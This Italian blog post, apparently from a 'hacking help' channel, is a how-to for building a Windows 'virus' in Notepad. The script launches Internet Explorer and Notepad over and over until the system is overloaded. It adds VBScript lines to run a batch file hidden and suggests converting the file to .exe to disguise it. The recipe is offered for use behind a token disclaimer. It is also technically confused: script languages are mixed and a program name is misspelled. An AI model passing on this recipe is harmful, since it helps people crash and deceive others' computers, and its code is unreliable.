lunedì 13 novembre 2017

Virus : Istruzioni per l'uso

👉 Cos'è un virus?

Il virus è un software che infetta la macchina di calcolo. Questo virus in particolar modo comporta un crash del sistema, se fatto per bene.

👉 Requisiti
 
1️⃣ Windows (Qualunque versione, da XP in poi),
2️⃣ Blocco Note.

👉 Creare il virus
 
1️⃣ Aprire il blocco note,
2️⃣ Scrivere più volte "start iexplore.exe",
3️⃣ Alternare le scritte "start iexplore.exe" con "start notepad.exe",
4️⃣ Aggiungere queste stringe alla fine:
    
  "Set WshShell = CreateObject("WScript.Shell")           
WshShell.Run chr(34) & "C:\Batch\test.bat" & Chr(34), 0
Set WshShell = Nothing"

👉 Come nasconderlo

Per nascoderlo basterà convertirlo in .exe tramite uno dei tanti programmi che vi sono in rete. (Bat to exe)

📎 Per scaricarlo basta cliccare il pulsantino alla fine del messaggio
  
👉 Risultato finale

Se avete fatto tutto correttamente, avrete ottenuto queste stringhe:

start iexplorer.exe
start notepad.exe
start iexplorer.exe
start notepad.exe
start iexplorer.exe
start notepad.exe
start iexplorer.exe
start notepad.exe
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "C:\Batch\test.bat" & Chr(34), 0
Set WshShell = Nothing
        
⚙️ Per sovraccaricare il sistema operativo, dovranno essere presenti molte stringhe.

Fonte:
  
⚠️ Attenzione: Guida a solo scopo informativo,  @HackingHelp  non si assume nessuna responsabilità dell'utilizzo che ne farete.

Nessun commento:

Posta un commento

Visualizzazioni totali